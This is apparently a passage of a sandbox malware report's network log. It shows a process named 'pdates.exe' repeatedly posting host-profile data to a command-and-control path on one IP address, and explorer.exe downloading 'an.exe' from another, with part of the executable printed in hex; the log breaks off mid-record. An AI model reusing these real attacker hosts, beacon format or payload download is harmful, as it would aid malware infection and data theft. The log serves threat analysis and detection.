Jul 27, 2023 01:33:21.876204014 CEST	2913	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:21.925638914 CEST	2913	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
690	192.168.2.5	50412	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:02.586225033 CEST	5833	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:02.635744095 CEST	5834	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
691	192.168.2.5	50413	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:02.790364027 CEST	5834	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:02.838484049 CEST	5834	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
692	192.168.2.5	50414	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:02.992733002 CEST	5835	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:03.042665958 CEST	5835	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
693	192.168.2.5	50415	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:03.208981991 CEST	5836	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:03.257718086 CEST	5836	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
694	192.168.2.5	50416	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:03.452749968 CEST	5837	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:03.501302004 CEST	5837	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
695	192.168.2.5	50417	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:03.671097040 CEST	5838	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:03.718766928 CEST	5838	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
696	192.168.2.5	50418	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:03.881098032 CEST	5839	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:03.928514004 CEST	5839	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
697	192.168.2.5	50419	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:04.097660065 CEST	5840	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:04.146229029 CEST	5840	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
698	192.168.2.5	50420	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:04.303092003 CEST	5841	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:04.351140022 CEST	5841	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
699	192.168.2.5	50421	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:04.507252932 CEST	5842	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:04.555488110 CEST	5842	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49723	77.91.124.47	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:01.663835049 CEST	986	OUT	GET /anon/an.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.91.124.47
Jul 27, 2023 01:33:01.709125042 CEST	987	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Wed, 26 Jul 2023 19:36:40 GMT Accept-Ranges: bytes ETag: "e6c4cb7ff8bfd91:0" Server: Microsoft-IIS/10.0 Date: Thu, 27 Jul 2023 07:33:00 GMT Content-Length: 165888 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 44 d8 fe 65 00 b9 90 36 00 b9 90 36 00 b9 90 36 14 d2 95 37 01 b9 90 36 14 d2 93 37 02 b9 90 36 14 d2 94 37 12 b9 90 36 14 d2 91 37 11 b9 90 36 00 b9 91 36 a0 b9 90 36 14 d2 98 37 0a b9 90 36 14 d2 6f 36 01 b9 90 36 14 d2 92 37 01 b9 90 36 52 69 63 68 00 b9 90 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f8 c4 1b ae 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 14 00 7c 00 00 00 08 02 00 00 00 00 00 00 82 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 e9 e6 02 00 02 00 60 c1 00 00 08 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c a2 00 00 b4 00 00 00 00 f0 00 00 24 d6 01 00 00 e0 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 20 00 00 00 10 9a 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 90 00 00 18 01 00 00 00 00 00 00 00 00 00 00 28 91 00 00 20 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 7b 00 00 00 10 00 00 00 7c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 22 00 00 00 90 00 00 00 24 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 1f 00 00 00 c0 00 00 00 04 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 04 00 00 00 e0 00 00 00 06 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 e0 01 00 00 f0 00 00 00 d8 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 00 00 00 00 d0 02 00 00 02 00 00 00 86 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc cc cc cc cc cc cc cc 45 33 c9 48 8d 42 ff 41 ba fe ff Data Ascii: MZ@!L!This program cannot be run in DOS mode.$De666767676766676o6676Rich6PEd"\|@` <$ T( .text{\| `.rdata"$@@.data@.pdata@@.rsrc@@.reloc @BE3HBA
Jul 27, 2023 01:33:01.709198952 CEST	988	IN	Data Raw: ff 7f 41 bb 57 00 07 80 49 3b c2 45 0f 47 cb 45 85 c9 78 47 48 85 d2 74 22 4c 2b d2 4c 2b c1 49 8d 04 12 48 85 c0 74 13 41 8a 04 08 84 c0 74 0b 88 01 48 ff c1 48 83 ea 01 75 e4 48 85 d2 48 8d 41 ff 48 0f 45 c1 48 f7 da 45 1b c9 41 f7 d1 41 81 e1 Data Ascii: AWI;EGExGHt"L+L+IHtAtHHuHHAHEHEAAzHtAE3LMHAWIBH=EGEx5IHMt8tHHuHHEAE#HtML+E3ExXIII+t.HMI+LL+M
Jul 27, 2023 01:33:01.709239006 CEST	990	IN	Data Raw: 84 24 20 02 00 00 49 8b f9 49 8b c0 48 8b d9 81 ea 10 01 00 00 74 27 83 fa 01 75 1e 49 81 c0 c3 f7 ff ff 49 83 f8 01 77 11 48 8b d0 48 ff 15 f4 7f 00 00 0f 1f 44 00 00 eb 68 33 c0 eb 69 48 ff 15 0a 80 00 00 0f 1f 44 00 00 48 8b d0 48 8b cb e8 fa Data Ascii: $ IIHt'uIIwHHDh3iHDHH6HLD$ AD$ HDLD$ ?HHDHDH$ H3nH$HH0_H\$Hl$Ht$WH HHH3@8+
Jul 27, 2023 01:33:01.709290028 CEST	991	IN	Data Raw: 00 48 8b cf e8 40 63 00 00 48 85 c0 0f 84 9a 00 00 00 48 8d 15 50 7d 00 00 89 5c 24 28 48 89 54 24 20 44 8b cb ba 01 00 00 00 4c 8b c0 8d 4a 7e 48 ff 15 a2 77 00 00 0f 1f 44 00 00 83 f8 02 75 6b 48 8d 35 d1 a6 00 00 48 8b c3 48 ff c0 44 38 2c 06 Data Ascii: H@cHHP}\$(HT$ DLJ~HwDukH5HHD8,uHL$@HD8,uH<@HWH3yDHHuE3E3NLL$@LHWH@HxDHHtHL$@HwDt}uyLD$@H`
Jul 27, 2023 01:33:01.709345102 CEST	992	IN	Data Raw: 74 00 00 0f 1f 44 00 00 48 8b f8 48 85 c0 75 59 21 44 24 28 45 33 c9 45 33 c0 c7 44 24 20 10 00 00 00 ba b5 04 00 00 33 c9 e8 79 2e 00 00 eb 23 48 8b 0d 14 bf 00 00 48 8d 54 24 60 44 8b c6 48 ff 15 85 74 00 00 0f 1f 44 00 00 85 c0 0f 85 70 ff ff Data Ascii: tDHHuY!D$(E3E3D$ 3y.#HHT$`DHtDpHL$PHrDALl$ LzLL$`EHHHLEH<uHL$PHA\$(E3H\|$ HdqDHL$PHqDHH\rD
Jul 27, 2023 01:33:01.709378004 CEST	994	IN	Data Raw: 30 48 89 5c 24 28 48 89 5c 24 20 48 ff 15 03 6d 00 00 0f 1f 44 00 00 e9 61 ff ff ff e8 f8 fd ff ff 8b d8 8b c3 48 8b 9c 24 80 00 00 00 48 83 c4 60 5d c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 81 ec 50 01 00 00 48 8b 05 8c 9b 00 00 48 Data Ascii: 0H\$(H\$ HmDaH$H`]H\$WHPHH3H$@HHL$0HmD3u\$(E3E3D$ 3)L$08H$@H3_H$`HP_H\$WHPHH3HD$@3'pI
Jul 27, 2023 01:33:01.709422112 CEST	995	IN	Data Raw: 00 48 ff 15 4f 6c 00 00 0f 1f 44 00 00 45 33 f6 85 c0 0f 84 a4 00 00 00 44 39 75 48 0f 84 9a 00 00 00 48 8b 45 f0 49 8d 8f 90 00 00 00 48 03 cf 41 8b d6 44 8b 48 0c 44 8b 40 08 44 3b 41 f4 73 05 83 c8 ff eb 15 76 07 b8 01 00 00 00 eb 0c 44 3b 49 Data Ascii: HOlDE3D9uHHEIHADHD@D;AsvD;IrADD;svD;IrADHHH\|D9u\|D9u~ D9u\|D9u~HHhDKE3HHhDF9?u-F9?u#HuPHEAH<HE
Jul 27, 2023 01:33:01.709464073 CEST	996	IN	Data Raw: 48 8d 0d 16 6a 00 00 e8 0d 22 00 00 ff c8 45 33 c9 33 c9 83 f8 7f 0f 87 52 02 00 00 45 8b c6 41 8b d6 48 ff 15 50 65 00 00 0f 1f 44 00 00 48 8b c8 48 89 05 c9 99 00 00 48 ff 15 ca 64 00 00 0f 1f 44 00 00 44 8d 47 04 48 8d 15 de af 00 00 48 8d 0d Data Ascii: Hj"E33REAHPeDHHHdDDGHHi!u-!\|$(E3E33D$ @uAHT$0Hid!3u!\|$(E3E3LD$0AHcDHHHb
Jul 27, 2023 01:33:01.709497929 CEST	998	IN	Data Raw: 0d 36 ab 00 00 e8 d1 ef ff ff eb 02 8b c7 89 05 2b ab 00 00 8b 05 ad 99 00 00 85 c0 75 1b 39 3d ff aa 00 00 75 13 e8 5c 0d 00 00 85 c0 0f 84 c6 fe ff ff 8b 05 8e 99 00 00 66 39 3d 9b 99 00 00 75 09 85 c0 75 05 e8 c4 15 00 00 b8 01 00 00 00 e9 a6 Data Ascii: 6+u9=u\f9=uuH8uMuIu3!LL$ MDHHH`DH8@SH0Ht't2IuAPI3
Jul 27, 2023 01:33:01.709531069 CEST	999	IN	Data Raw: 83 ec 20 48 8b d9 83 ea 10 0f 84 95 00 00 00 81 ea 00 01 00 00 74 34 83 fa 01 74 07 33 c0 e9 97 00 00 00 49 83 f8 06 0f 82 88 00 00 00 49 83 f8 07 76 13 49 81 f8 39 08 00 00 75 79 c7 05 77 9d 00 00 01 00 00 00 49 8b d0 eb 5e 48 ff 15 d3 5c 00 00 Data Ascii: Ht4t3IIvI9uywI^H\DHHHHH\DLn8HH\DHH0\DHM\DH [H\$Ht$WH0IH
Jul 27, 2023 01:33:01.754473925 CEST	1001	IN	Data Raw: c1 43 3b 54 c4 0c 72 12 76 04 8b c6 eb 0c 47 3b 74 c4 10 72 05 8b c3 0f 97 c0 85 c9 0f 88 ac 00 00 00 85 c0 0f 8f a4 00 00 00 85 c9 75 22 85 c0 75 11 41 8b c7 47 3b 7c c4 08 72 27 43 3b 44 c4 14 eb 1a 47 3b 7c c4 08 0f 83 a5 00 00 00 eb 13 85 c0 Data Ascii: C;TrvG;tru"uAG;\|r'C;DG;\|G;\|EtkLLLDMuALMIcHLk<MLMAD$4MLAD$0@AD;tESDT$0EA}Lu-

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.5	49787	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:22.107824087 CEST	2914	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:22.155992031 CEST	2914	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
700	192.168.2.5	50422	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:04.720467091 CEST	5843	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:04.768547058 CEST	5843	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
701	192.168.2.5	50423	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:04.934509993 CEST	5844	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:04.983108997 CEST	5844	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
702	192.168.2.5	50424	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
